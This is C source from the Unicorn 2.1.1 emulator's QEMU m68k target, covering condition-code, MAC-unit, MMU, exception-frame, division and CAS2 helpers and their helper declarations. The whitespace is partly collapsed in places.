cpu_m68k_set_ccr(CPUM68KState *env, uint32_t ccr) { env->cc_x = (ccr & CCF_X ? 1 : 0); env->cc_n = (ccr & CCF_N ? -1 : 0); env->cc_z = (ccr & CCF_Z ? 0 : 1); env->cc_v = (ccr & CCF_V ? -1 : 0); env->cc_c = (ccr & CCF_C ? 1 : 0); env->cc_op = CC_OP_FLAGS; } void HELPER(set_ccr)(CPUM68KState *env, uint32_t ccr) { cpu_m68k_set_ccr(env, ccr); } void HELPER(flush_flags)(CPUM68KState *env, uint32_t cc_op) { uint32_t res, src1, src2; COMPUTE_CCR(cc_op, env->cc_x, env->cc_n, env->cc_z, env->cc_v, env->cc_c); env->cc_op = CC_OP_FLAGS; } uint32_t HELPER(get_macf)(CPUM68KState *env, uint64_t val) { int rem; uint32_t result; if (env->macsr & MACSR_SU) { /* 16-bit rounding. */ rem = val & 0xffffff; val = (val >> 24) & 0xffffu; if (rem > 0x800000) val++; else if (rem == 0x800000) val += (val & 1); } else if (env->macsr & MACSR_RT) { /* 32-bit rounding. */ rem = val & 0xff; val >>= 8; if (rem > 0x80) val++; else if (rem == 0x80) val += (val & 1); } else { /* No rounding. */ val >>= 8; } if (env->macsr & MACSR_OMC) { /* Saturate. */ if (env->macsr & MACSR_SU) { if (val != (uint16_t) val) { result = ((val >> 63) ^ 0x7fff) & 0xffff; } else { result = val & 0xffff; } } else { if (val != (uint32_t)val) { result = ((uint32_t)(val >> 63) & 0x7fffffff); } else { result = (uint32_t)val; } } } else { /* No saturation. 
*/ if (env->macsr & MACSR_SU) { result = val & 0xffff; } else { result = (uint32_t)val; } } return result; } uint32_t HELPER(get_macs)(uint64_t val) { if (val == (int32_t)val) { return (int32_t)val; } else { return (val >> 61) ^ ~SIGNBIT; } } uint32_t HELPER(get_macu)(uint64_t val) { if ((val >> 32) == 0) { return (uint32_t)val; } else { return 0xffffffffu; } } uint32_t HELPER(get_mac_extf)(CPUM68KState *env, uint32_t acc) { uint32_t val; val = env->macc[acc] & 0x00ff; val |= (env->macc[acc] >> 32) & 0xff00; val |= (env->macc[acc + 1] << 16) & 0x00ff0000; val |= (env->macc[acc + 1] >> 16) & 0xff000000; return val; } uint32_t HELPER(get_mac_exti)(CPUM68KState *env, uint32_t acc) { uint32_t val; val = (env->macc[acc] >> 32) & 0xffff; val |= (env->macc[acc + 1] >> 16) & 0xffff0000; return val; } void HELPER(set_mac_extf)(CPUM68KState *env, uint32_t val, uint32_t acc) { int64_t res; int32_t tmp; res = env->macc[acc] & 0xffffffff00ull; tmp = (int16_t)(val & 0xff00); res |= ((int64_t)tmp) << 32; res |= val & 0xff; env->macc[acc] = res; res = env->macc[acc + 1] & 0xffffffff00ull; tmp = (val & 0xff000000); res |= ((int64_t)tmp) << 16; res |= (val >> 16) & 0xff; env->macc[acc + 1] = res; } void HELPER(set_mac_exts)(CPUM68KState *env, uint32_t val, uint32_t acc) { int64_t res; int32_t tmp; res = (uint32_t)env->macc[acc]; tmp = (int16_t)val; res |= ((int64_t)tmp) << 32; env->macc[acc] = res; res = (uint32_t)env->macc[acc + 1]; tmp = val & 0xffff0000; res |= (int64_t)tmp << 16; env->macc[acc + 1] = res; } void HELPER(set_mac_extu)(CPUM68KState *env, uint32_t val, uint32_t acc) { uint64_t res; res = (uint32_t)env->macc[acc]; res |= ((uint64_t)(val & 0xffff)) << 32; env->macc[acc] = res; res = (uint32_t)env->macc[acc + 1]; res |= (uint64_t)(val & 0xffff0000) << 16; env->macc[acc + 1] = res; } void HELPER(ptest)(CPUM68KState *env, uint32_t addr, uint32_t is_read) { hwaddr physical; int access_type; int prot; int ret; target_ulong page_size; access_type = ACCESS_PTEST; if (env->dfc & 4) { access_type |= ACCESS_SUPER; } if ((env->dfc & 3) == 2) { access_type |= ACCESS_CODE; } if (!is_read) { access_type |= ACCESS_STORE; } env->mmu.mmusr = 0; env->mmu.ssw = 0; ret = get_physical_address(env, &physical, &prot, addr, access_type, &page_size); if (ret == 0) { addr &= TARGET_PAGE_MASK; physical += addr & (page_size - 1); tlb_set_page(env_cpu(env), addr, physical, prot, access_type & ACCESS_SUPER ? 
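/* preload QEMU's TLB with the mapping, mirroring the ATC entry that PTEST creates */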
MMU_KERNEL_IDX : MMU_USER_IDX,
                     page_size);
    }
}

void HELPER(pflush)(CPUM68KState *env, uint32_t addr, uint32_t opmode)
{
    CPUState *cs = env_cpu(env);

    switch (opmode) {
    case 0: /* Flush page entry if not global */
    case 1: /* Flush page entry */
        tlb_flush_page(cs, addr);
        break;
    case 2: /* Flush all except global entries */
        tlb_flush(cs);
        break;
    case 3: /* Flush all entries */
        tlb_flush(cs);
        break;
    }
}

void HELPER(reset)(CPUM68KState *env)
{
    /* FIXME: reset all except CPU */
}

unicorn-2.1.1/qemu/target/m68k/helper.h

DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64)
DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64)
DEF_HELPER_1(bitrev, i32, i32)
DEF_HELPER_1(ff1, i32, i32)
DEF_HELPER_FLAGS_2(sats, TCG_CALL_NO_RWG_SE, i32, i32, i32)
DEF_HELPER_3(divuw, void, env, int, i32)
DEF_HELPER_3(divsw, void, env, int, s32)
DEF_HELPER_4(divul, void, env, int, int, i32)
DEF_HELPER_4(divsl, void, env, int, int, s32)
DEF_HELPER_4(divull, void, env, int, int, i32)
DEF_HELPER_4(divsll, void, env, int, int, s32)
DEF_HELPER_2(set_sr, void, env, i32)
DEF_HELPER_3(cf_movec_to, void, env, i32, i32)
DEF_HELPER_3(m68k_movec_to, void, env, i32, i32)
DEF_HELPER_2(m68k_movec_from, i32, env, i32)
DEF_HELPER_4(cas2w, void, env, i32, i32, i32)
DEF_HELPER_4(cas2l, void, env, i32, i32, i32)
DEF_HELPER_4(cas2l_parallel, void, env, i32, i32, i32)

#define dh_alias_fp ptr
#define dh_ctype_fp FPReg *
#define dh_is_signed_fp dh_is_signed_ptr

DEF_HELPER_3(exts32, void, env, fp, s32)
DEF_HELPER_3(extf32, void, env, fp, f32)
DEF_HELPER_3(extf64, void, env, fp, f64)
DEF_HELPER_2(redf32, f32, env, fp)
DEF_HELPER_2(redf64, f64, env, fp)
DEF_HELPER_2(reds32, s32, env, fp)
DEF_HELPER_3(fsround, void, env, fp, fp)
DEF_HELPER_3(fdround, void, env, fp, fp)
DEF_HELPER_3(firound, void, env, fp, fp)
DEF_HELPER_3(fitrunc, void, env, fp, fp)
DEF_HELPER_3(fsqrt, void, env, fp, fp)
DEF_HELPER_3(fssqrt, void, env, fp, fp)
DEF_HELPER_3(fdsqrt, void, env, fp, fp)
DEF_HELPER_3(fabs, void, env, fp, fp)
DEF_HELPER_3(fsabs, void, env, fp, fp)
DEF_HELPER_3(fdabs, void, env, fp, fp)
DEF_HELPER_3(fneg, void, env, fp, fp)
DEF_HELPER_3(fsneg, void, env, fp, fp)
DEF_HELPER_3(fdneg, void, env, fp, fp)
DEF_HELPER_4(fadd, void, env, fp, fp, fp)
DEF_HELPER_4(fsadd, void, env, fp, fp, fp)
DEF_HELPER_4(fdadd, void, env, fp, fp, fp)
DEF_HELPER_4(fsub, void, env, fp, fp, fp)
DEF_HELPER_4(fssub, void, env, fp, fp, fp)
DEF_HELPER_4(fdsub, void, env, fp, fp, fp)
DEF_HELPER_4(fmul, void, env, fp, fp, fp)
DEF_HELPER_4(fsmul, void, env, fp, fp, fp)
DEF_HELPER_4(fdmul, void, env, fp, fp, fp)
DEF_HELPER_4(fsglmul,
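/* fsglmul/fsgldiv implement FSGLMUL/FSGLDIV, which round their operands to single precision first */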
void, env, fp, fp, fp) DEF_HELPER_4(fdiv, void, env, fp, fp, fp) DEF_HELPER_4(fsdiv, void, env, fp, fp, fp) DEF_HELPER_4(fddiv, void, env, fp, fp, fp) DEF_HELPER_4(fsgldiv, void, env, fp, fp, fp) DEF_HELPER_FLAGS_3(fcmp, TCG_CALL_NO_RWG, void, env, fp, fp) DEF_HELPER_FLAGS_2(set_fpcr, TCG_CALL_NO_RWG, void, env, i32) DEF_HELPER_FLAGS_2(ftst, TCG_CALL_NO_RWG, void, env, fp) DEF_HELPER_3(fconst, void, env, fp, i32) DEF_HELPER_3(fmovemx_st_predec, i32, env, i32, i32) DEF_HELPER_3(fmovemx_st_postinc, i32, env, i32, i32) DEF_HELPER_3(fmovemx_ld_postinc, i32, env, i32, i32) DEF_HELPER_3(fmovemd_st_predec, i32, env, i32, i32) DEF_HELPER_3(fmovemd_st_postinc, i32, env, i32, i32) DEF_HELPER_3(fmovemd_ld_postinc, i32, env, i32, i32) DEF_HELPER_4(fmod, void, env, fp, fp, fp) DEF_HELPER_4(frem, void, env, fp, fp, fp) DEF_HELPER_3(fgetexp, void, env, fp, fp) DEF_HELPER_3(fgetman, void, env, fp, fp) DEF_HELPER_4(fscale, void, env, fp, fp, fp) DEF_HELPER_3(flognp1, void, env, fp, fp) DEF_HELPER_3(flogn, void, env, fp, fp) DEF_HELPER_3(flog10, void, env, fp, fp) DEF_HELPER_3(flog2, void, env, fp, fp) DEF_HELPER_3(fetox, void, env, fp, fp) DEF_HELPER_3(ftwotox, void, env, fp, fp) DEF_HELPER_3(ftentox, void, env, fp, fp) DEF_HELPER_3(ftan, void, env, fp, fp) DEF_HELPER_3(fsin, void, env, fp, fp) DEF_HELPER_3(fcos, void, env, fp, fp) DEF_HELPER_4(fsincos, void, env, fp, fp, fp) DEF_HELPER_3(fatan, void, env, fp, fp) DEF_HELPER_3(fasin, void, env, fp, fp) DEF_HELPER_3(facos, void, env, fp, fp) DEF_HELPER_3(fatanh, void, env, fp, fp) DEF_HELPER_3(ftanh, void, env, fp, fp) DEF_HELPER_3(fsinh, void, env, fp, fp) DEF_HELPER_3(fcosh, void, env, fp, fp) DEF_HELPER_3(mac_move, void, env, i32, i32) DEF_HELPER_3(macmulf, i64, env, i32, i32) DEF_HELPER_3(macmuls, i64, env, i32, i32) DEF_HELPER_3(macmulu, i64, env, i32, i32) DEF_HELPER_2(macsats, void, env, i32) DEF_HELPER_2(macsatu, void, env, i32) DEF_HELPER_2(macsatf, void, env, i32) DEF_HELPER_2(mac_set_flags, void, env, i32) DEF_HELPER_2(set_macsr, void, env, i32) DEF_HELPER_2(get_macf, i32, env, i64) DEF_HELPER_1(get_macs, i32, i64) DEF_HELPER_1(get_macu, i32, i64) DEF_HELPER_2(get_mac_extf, i32, env, i32) DEF_HELPER_2(get_mac_exti, i32, env, i32) DEF_HELPER_3(set_mac_extf, void, env, i32, i32) DEF_HELPER_3(set_mac_exts, void, env, i32, i32) DEF_HELPER_3(set_mac_extu, void, env, i32, i32) DEF_HELPER_2(flush_flags, void, env, i32) DEF_HELPER_2(set_ccr, void, env, i32) DEF_HELPER_FLAGS_1(get_ccr, TCG_CALL_NO_WG_SE, i32, env) DEF_HELPER_2(raise_exception, void, env, i32) DEF_HELPER_FLAGS_3(bfffo_reg, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) DEF_HELPER_FLAGS_4(bfexts_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfextu_mem, TCG_CALL_NO_WG, i64, env, i32, s32, i32) DEF_HELPER_FLAGS_5(bfins_mem, TCG_CALL_NO_WG, i32, env, i32, i32, s32, i32) DEF_HELPER_FLAGS_4(bfchg_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfclr_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfset_mem, TCG_CALL_NO_WG, i32, env, i32, s32, i32) DEF_HELPER_FLAGS_4(bfffo_mem, TCG_CALL_NO_WG, i64, env, i32, s32, i32) DEF_HELPER_3(chk, void, env, s32, s32) DEF_HELPER_4(chk2, void, env, s32, s32, s32) DEF_HELPER_3(ptest, void, env, i32, i32) DEF_HELPER_3(pflush, void, env, i32, i32) DEF_HELPER_FLAGS_1(reset, TCG_CALL_NO_RWG, void, env) 
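/*
 * Illustrative sketch (not part of the original header): given the
 * dh_alias_fp/dh_ctype_fp definitions above, QEMU's generic helper
 * machinery (exec/helper-proto.h and exec/helper-gen.h) expands each
 * declaration into a C prototype plus a translator-side emitter.
 * Assuming the standard expansion, a line such as
 *
 *     DEF_HELPER_3(fsqrt, void, env, fp, fp)
 *
 * yields approximately:
 *
 *     void helper_fsqrt(CPUM68KState *env, FPReg *res, FPReg *val);
 *
 * together with a gen_helper_fsqrt() that translate.c calls to emit
 * the runtime call into the TCG instruction stream.
 */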
unicorn-2.1.1/qemu/target/m68k/op_helper.c

/*
 * M68K helper routines
 *
 * Copyright (c) 2007 CodeSourcery
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#include "qemu/osdep.h"
#include "cpu.h"
#include "exec/helper-proto.h"
#include "exec/exec-all.h"
#include "exec/cpu_ldst.h"

static void cf_rte(CPUM68KState *env)
{
    uint32_t sp;
    uint32_t fmt;

    sp = env->aregs[7];
    fmt = cpu_ldl_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0);
    env->pc = cpu_ldl_mmuidx_ra(env, sp + 4, MMU_KERNEL_IDX, 0);
    sp |= (fmt >> 28) & 3;
    env->aregs[7] = sp + 8;

    cpu_m68k_set_sr(env, fmt);
}

static void m68k_rte(CPUM68KState *env)
{
    uint32_t sp;
    uint16_t fmt;
    uint16_t sr;

    sp = env->aregs[7];
throwaway:
    sr = cpu_lduw_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0);
    sp += 2;
    env->pc = cpu_ldl_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0);
    sp += 4;
    if (m68k_feature(env, M68K_FEATURE_QUAD_MULDIV)) {
        /* all except 68000 */
        fmt = cpu_lduw_mmuidx_ra(env, sp, MMU_KERNEL_IDX, 0);
        sp += 2;
        switch (fmt >> 12) {
        case 0:
            break;
        case 1:
            env->aregs[7] = sp;
            cpu_m68k_set_sr(env, sr);
            goto throwaway;
        case 2:
        case 3:
            sp += 4;
            break;
        case 4:
            sp += 8;
            break;
        case 7:
            sp += 52;
            break;
        }
    }
    env->aregs[7] = sp;
    cpu_m68k_set_sr(env, sr);
}

static void cf_interrupt_all(CPUM68KState *env, int is_hw)
{
    CPUState *cs = env_cpu(env);
    uint32_t sp;
    uint32_t sr;
    uint32_t fmt;
    uint32_t retaddr;
    uint32_t vector;

    fmt = 0;
    retaddr = env->pc;

    if (!is_hw) {
        switch (cs->exception_index) {
        case EXCP_RTE:
            /* Return from an exception. */
            cf_rte(env);
            return;
        case EXCP_HALT_INSN:
            cs->halted = 1;
            cs->exception_index = EXCP_HLT;
            cpu_loop_exit(cs);
            return;
        }
        if (cs->exception_index >= EXCP_TRAP0 &&
            cs->exception_index <= EXCP_TRAP15) {
            /* Move the PC after the trap instruction. */
            retaddr += 2;
        }
    }

    vector = cs->exception_index << 2;

    sr = env->sr | cpu_m68k_get_ccr(env);

    fmt |= 0x40000000;
    fmt |= vector << 16;
    fmt |= sr;

    env->sr |= SR_S;
    if (is_hw) {
        env->sr = (env->sr & ~SR_I) | (env->pending_level << SR_I_SHIFT);
        env->sr &= ~SR_M;
    }
    m68k_switch_sp(env);
    sp = env->aregs[7];
    fmt |= (sp & 3) << 28;

    /* ??? This could cause MMU faults. */
    sp &= ~3;
    sp -= 4;
    cpu_stl_mmuidx_ra(env, sp, retaddr, MMU_KERNEL_IDX, 0);
    sp -= 4;
    cpu_stl_mmuidx_ra(env, sp, fmt, MMU_KERNEL_IDX, 0);
    env->aregs[7] = sp;
    /* Jump to vector.
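* Each vector table entry is a 32-bit handler address fetched from VBR + vector.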
*/ env->pc = cpu_ldl_mmuidx_ra(env, env->vbr + vector, MMU_KERNEL_IDX, 0); } static inline void do_stack_frame(CPUM68KState *env, uint32_t *sp, uint16_t format, uint16_t sr, uint32_t addr, uint32_t retaddr) { if (m68k_feature(env, M68K_FEATURE_QUAD_MULDIV)) { /* all except 68000 */ CPUState *cs = env_cpu(env); switch (format) { case 4: *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, env->pc, MMU_KERNEL_IDX, 0); *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, addr, MMU_KERNEL_IDX, 0); break; case 3: case 2: *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, addr, MMU_KERNEL_IDX, 0); break; } *sp -= 2; cpu_stw_mmuidx_ra(env, *sp, (format << 12) + (cs->exception_index << 2), MMU_KERNEL_IDX, 0); } *sp -= 4; cpu_stl_mmuidx_ra(env, *sp, retaddr, MMU_KERNEL_IDX, 0); *sp -= 2; cpu_stw_mmuidx_ra(env, *sp, sr, MMU_KERNEL_IDX, 0); } static void m68k_interrupt_all(CPUM68KState *env, int is_hw) { CPUState *cs = env_cpu(env); uint32_t sp; uint32_t retaddr; uint32_t vector; uint16_t sr, oldsr; retaddr = env->pc; if (!is_hw) { switch (cs->exception_index) { case EXCP_RTE: /* Return from an exception. */ m68k_rte(env); return; case EXCP_TRAP0: case EXCP_TRAP0 + 1: case EXCP_TRAP0 + 2: case EXCP_TRAP0 + 3: case EXCP_TRAP0 + 4: case EXCP_TRAP0 + 5: case EXCP_TRAP0 + 6: case EXCP_TRAP0 + 7: case EXCP_TRAP0 + 8: case EXCP_TRAP0 + 9: case EXCP_TRAP0 + 10: case EXCP_TRAP0 + 11: case EXCP_TRAP0 + 12: case EXCP_TRAP0 + 13: case EXCP_TRAP0 + 14: case EXCP_TRAP15: /* Move the PC after the trap instruction. */ retaddr += 2; break; } } vector = cs->exception_index << 2; sr = env->sr | cpu_m68k_get_ccr(env); /* * MC68040UM/AD, chapter 9.3.10 */ /* "the processor first make an internal copy" */ oldsr = sr; /* "set the mode to supervisor" */ sr |= SR_S; /* "suppress tracing" */ sr &= ~SR_T; /* "sets the processor interrupt mask" */ if (is_hw) { sr |= (env->sr & ~SR_I) | (env->pending_level << SR_I_SHIFT); } cpu_m68k_set_sr(env, sr); sp = env->aregs[7]; sp &= ~1; if (cs->exception_index == EXCP_ACCESS) { if (env->mmu.fault) { cpu_abort(cs, "DOUBLE MMU FAULT\n"); } env->mmu.fault = true; /* push data 3 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* push data 2 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* push data 1 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 1 / push data 0 */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 1 address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 2 data */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 2 address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 3 data */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 3 address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, env->mmu.ar, MMU_KERNEL_IDX, 0); /* fault address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, env->mmu.ar, MMU_KERNEL_IDX, 0); /* write back 1 status */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 2 status */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* write back 3 status */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, 0, MMU_KERNEL_IDX, 0); /* special status word */ sp -= 2; cpu_stw_mmuidx_ra(env, sp, env->mmu.ssw, MMU_KERNEL_IDX, 0); /* effective address */ sp -= 4; cpu_stl_mmuidx_ra(env, sp, env->mmu.ar, MMU_KERNEL_IDX, 0); do_stack_frame(env, &sp, 7, oldsr, 0, retaddr); env->mmu.fault = false; } else if (cs->exception_index == EXCP_ADDRESS) { do_stack_frame(env, &sp, 2, oldsr, 0, retaddr); } else if (cs->exception_index == 
EXCP_ILLEGAL || cs->exception_index == EXCP_DIV0 || cs->exception_index == EXCP_CHK || cs->exception_index == EXCP_TRAPCC || cs->exception_index == EXCP_TRACE) { /* FIXME: addr is not only env->pc */ do_stack_frame(env, &sp, 2, oldsr, env->pc, retaddr); } else if (is_hw && oldsr & SR_M && cs->exception_index >= EXCP_SPURIOUS && cs->exception_index <= EXCP_INT_LEVEL_7) { do_stack_frame(env, &sp, 0, oldsr, 0, retaddr); oldsr = sr; env->aregs[7] = sp; cpu_m68k_set_sr(env, sr &= ~SR_M); sp = env->aregs[7] & ~1; do_stack_frame(env, &sp, 1, oldsr, 0, retaddr); } else { do_stack_frame(env, &sp, 0, oldsr, 0, retaddr); } env->aregs[7] = sp; /* Jump to vector. */ env->pc = cpu_ldl_mmuidx_ra(env, env->vbr + vector, MMU_KERNEL_IDX, 0); } static void do_interrupt_all(CPUM68KState *env, int is_hw) { if (m68k_feature(env, M68K_FEATURE_M68000)) { m68k_interrupt_all(env, is_hw); return; } cf_interrupt_all(env, is_hw); } void m68k_cpu_do_interrupt(CPUState *cs) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; do_interrupt_all(env, 0); } static inline void do_interrupt_m68k_hardirq(CPUM68KState *env) { do_interrupt_all(env, 1); } void m68k_cpu_transaction_failed(CPUState *cs, hwaddr physaddr, vaddr addr, unsigned size, MMUAccessType access_type, int mmu_idx, MemTxAttrs attrs, MemTxResult response, uintptr_t retaddr) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; cpu_restore_state(cs, retaddr, true); if (m68k_feature(env, M68K_FEATURE_M68040)) { env->mmu.mmusr = 0; env->mmu.ssw |= M68K_ATC_040; /* FIXME: manage MMU table access error */ env->mmu.ssw &= ~M68K_TM_040; if (env->sr & SR_S) { /* SUPERVISOR */ env->mmu.ssw |= M68K_TM_040_SUPER; } if (access_type == MMU_INST_FETCH) { /* instruction or data */ env->mmu.ssw |= M68K_TM_040_CODE; } else { env->mmu.ssw |= M68K_TM_040_DATA; } env->mmu.ssw &= ~M68K_BA_SIZE_MASK; switch (size) { case 1: env->mmu.ssw |= M68K_BA_SIZE_BYTE; break; case 2: env->mmu.ssw |= M68K_BA_SIZE_WORD; break; case 4: env->mmu.ssw |= M68K_BA_SIZE_LONG; break; } if (access_type != MMU_DATA_STORE) { env->mmu.ssw |= M68K_RW_040; } env->mmu.ar = addr; cs->exception_index = EXCP_ACCESS; cpu_loop_exit(cs); } } bool m68k_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { M68kCPU *cpu = M68K_CPU(cs); CPUM68KState *env = &cpu->env; if (interrupt_request & CPU_INTERRUPT_HARD && ((env->sr & SR_I) >> SR_I_SHIFT) < env->pending_level) { /* * Real hardware gets the interrupt vector via an IACK cycle * at this point. Current emulated hardware doesn't rely on * this, so we provide/save the vector when the interrupt is * first signalled. 
*/
*/ cs->exception_index = env->pending_vector; do_interrupt_m68k_hardirq(env); return true; } return false; } static void raise_exception_ra(CPUM68KState *env, int tt, uintptr_t raddr) { CPUState *cs = env_cpu(env); cs->exception_index = tt; cpu_loop_exit_restore(cs, raddr); } static void raise_exception(CPUM68KState *env, int tt) { raise_exception_ra(env, tt, 0); } void HELPER(raise_exception)(CPUM68KState *env, uint32_t tt) { raise_exception(env, tt); } void HELPER(divuw)(CPUM68KState *env, int destr, uint32_t den) { uint32_t num = env->dregs[destr]; uint32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot > 0xffff) { env->cc_v = -1; /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->dregs[destr] = deposit32(quot, 16, 16, rem); env->cc_z = (int16_t)quot; env->cc_n = (int16_t)quot; env->cc_v = 0; } void HELPER(divsw)(CPUM68KState *env, int destr, int32_t den) { int32_t num = env->dregs[destr]; uint32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot != (int16_t)quot) { env->cc_v = -1; /* nothing else is modified */ /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->dregs[destr] = deposit32(quot, 16, 16, rem); env->cc_z = (int16_t)quot; env->cc_n = (int16_t)quot; env->cc_v = 0; } void HELPER(divul)(CPUM68KState *env, int numr, int regr, uint32_t den) { uint32_t num = env->dregs[numr]; uint32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; if (m68k_feature(env, M68K_FEATURE_CF_ISA_A)) { if (numr == regr) { env->dregs[numr] = quot; } else { env->dregs[regr] = rem; } } else { env->dregs[regr] = rem; env->dregs[numr] = quot; } } void HELPER(divsl)(CPUM68KState *env, int numr, int regr, int32_t den) { int32_t num = env->dregs[numr]; int32_t quot, rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; if (m68k_feature(env, M68K_FEATURE_CF_ISA_A)) { if (numr == regr) { env->dregs[numr] = quot; } else { env->dregs[regr] = rem; } } else { env->dregs[regr] = rem; env->dregs[numr] = quot; } } void HELPER(divull)(CPUM68KState *env, int numr, int regr, uint32_t den) { uint64_t num = deposit64(env->dregs[numr], 32, 32, env->dregs[regr]); uint64_t quot; uint32_t rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot > 0xffffffffULL) { env->cc_v = -1; /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; /* * If Dq and Dr are the same, the quotient is returned. * therefore we set Dq last. 
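* (writing the remainder first means the quotient overwrites it in that case).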
*/ env->dregs[regr] = rem; env->dregs[numr] = quot; } void HELPER(divsll)(CPUM68KState *env, int numr, int regr, int32_t den) { int64_t num = deposit64(env->dregs[numr], 32, 32, env->dregs[regr]); int64_t quot; int32_t rem; if (den == 0) { raise_exception_ra(env, EXCP_DIV0, GETPC()); } quot = num / den; rem = num % den; env->cc_c = 0; /* always cleared, even if overflow */ if (quot != (int32_t)quot) { env->cc_v = -1; /* * real 68040 keeps N and unset Z on overflow, * whereas documentation says "undefined" */ env->cc_z = 1; return; } env->cc_z = quot; env->cc_n = quot; env->cc_v = 0; /* * If Dq and Dr are the same, the quotient is returned. * therefore we set Dq last. */ env->dregs[regr] = rem; env->dregs[numr] = quot; } /* We're executing in a serial context -- no need to be atomic. */ void HELPER(cas2w)(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2) { uint32_t Dc1 = extract32(regs, 9, 3); uint32_t Dc2 = extract32(regs, 6, 3); uint32_t Du1 = extract32(regs, 3, 3); uint32_t Du2 = extract32(regs, 0, 3); int16_t c1 = env->dregs[Dc1]; int16_t c2 = env->dregs[Dc2]; int16_t u1 = env->dregs[Du1]; int16_t u2 = env->dregs[Du2]; int16_t l1, l2; uintptr_t ra = GETPC(); l1 = cpu_lduw_data_ra(env, a1, ra); l2 = cpu_lduw_data_ra(env, a2, ra); if (l1 == c1 && l2 == c2) { cpu_stw_data_ra(env, a1, u1, ra); cpu_stw_data_ra(env, a2, u2, ra); } if (c1 != l1) { env->cc_n = l1; env->cc_v = c1; } else { env->cc_n = l2; env->cc_v = c2; } env->cc_op = CC_OP_CMPW; env->dregs[Dc1] = deposit32(env->dregs[Dc1], 0, 16, l1); env->dregs[Dc2] = deposit32(env->dregs[Dc2], 0, 16, l2); } static void do_cas2l(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2, bool parallel) { uint32_t Dc1 = extract32(regs, 9, 3); uint32_t Dc2 = extract32(regs, 6, 3); uint32_t Du1 = extract32(regs, 3, 3); uint32_t Du2 = extract32(regs, 0, 3); uint32_t c1 = env->dregs[Dc1]; uint32_t c2 = env->dregs[Dc2]; uint32_t u1 = env->dregs[Du1]; uint32_t u2 = env->dregs[Du2]; uint32_t l1, l2; uintptr_t ra = GETPC(); #if defined(CONFIG_ATOMIC64) int mmu_idx = cpu_mmu_index(env, 0); TCGMemOpIdx oi; #endif if (parallel) { /* We're executing in a parallel context -- must be atomic. */ #ifdef CONFIG_ATOMIC64 uint64_t c, u, l; if ((a1 & 7) == 0 && a2 == a1 + 4) { c = deposit64(c2, 32, 32, c1); u = deposit64(u2, 32, 32, u1); oi = make_memop_idx(MO_BEQ, mmu_idx); l = helper_atomic_cmpxchgq_be_mmu(env, a1, c, u, oi, ra); l1 = l >> 32; l2 = l; } else if ((a2 & 7) == 0 && a1 == a2 + 4) { c = deposit64(c1, 32, 32, c2); u = deposit64(u1, 32, 32, u2); oi = make_memop_idx(MO_BEQ, mmu_idx); l = helper_atomic_cmpxchgq_be_mmu(env, a2, c, u, oi, ra); l2 = l >> 32; l1 = l; } else 